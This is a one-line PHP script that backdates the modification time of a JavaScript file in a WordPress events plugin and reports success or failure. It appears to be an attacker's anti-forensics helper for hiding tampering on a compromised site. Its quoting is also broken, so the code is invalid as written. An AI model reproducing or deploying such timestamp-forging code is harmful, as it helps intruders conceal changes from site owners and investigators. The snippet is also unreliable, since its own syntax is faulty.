<?php $path = '{$_SERVER['DOCUMENT_ROOT']}/wp-content/plugins/ova-events/assets/libs/tooltip.min.js'; if (@touch($path, 1657270144)) { die('!success!'); } die('!failed!');